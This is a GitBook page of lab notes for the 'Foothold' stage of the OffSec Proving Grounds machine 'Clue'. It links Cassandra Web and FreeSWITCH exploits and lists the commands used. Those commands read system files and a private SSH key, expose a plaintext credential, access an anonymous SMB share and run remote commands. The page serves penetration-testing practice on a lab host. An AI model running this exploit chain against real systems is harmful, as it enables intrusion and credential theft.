OffSec Proving Grounds
Ctrlk
LinkedIn
  • Proving Grounds
    • Proving Grounds Practice
      • Active Directory
      • Windows
      • Linux
        • ZenPhoto
        • ClamAV
        • PayDay
        • Clue
          • Recon
          • Enumeration
          • Foothold
            • Enumeration
          • Priv Esc
          • Credentials / Notes / LL
        • Pelican
        • Zipper
        • Postfish
        • LaVita
        • Flu
        • Peppo
        • Xposedapi
        • Marketing
        • Ochima
    • Proving Ground Play
    • Template
Powered by GitBook
On this page
  1. Proving Grounds
  2. Proving Grounds Practice
  3. Linux
  4. Clue

Foothold

LogoCassandra Web 0.5.0 - Remote File ReadExploit Database
LogoFreeSWITCH 1.10.1 - Command ExecutionExploit Database
LogoFreeSWITCH 1.10.1 - Command ExecutionExploit Database

After failed attempts with cassie tried root

Previous3000NextEnumeration

Last updated 1 year ago

$ searchsploit -m 49362
$ python 49362.py 192.168.184.240 -p 3000 /etc/passwd
anthony
cassie
$ python 49362.py 192.168.184.240 -p 3000 '/proc/self/cmdline'
cassie:SecondBiteTheApple330
$ smbclient '\\192.168.184.240\backup' -U '' -N
Try "help" to get a list of possible commands.
smb: \> recurse on
smb: \> prompt off
smb: \> mget *
$ grep -rwi password
$ python 49362.py 192.168.184.240 -p 3000 '/etc/freeswitch/autoload_configs/event_socket.conf.xml' | grep -i passw
$ telnet 192.168.184.240 8021
$ python 47799.py 192.168.184.240 whoami
$ python 47799.py 192.168.184.240 "ls /home/cassie/"
$ python 49362.py 192.168.184.240 -p 3000 '/home/cassie/id_rsa'
$ chmod 600 id_cassie
$ ssh -F /dev/null -o "IdentitiesOnly=yes" [email protected] -i id_cassie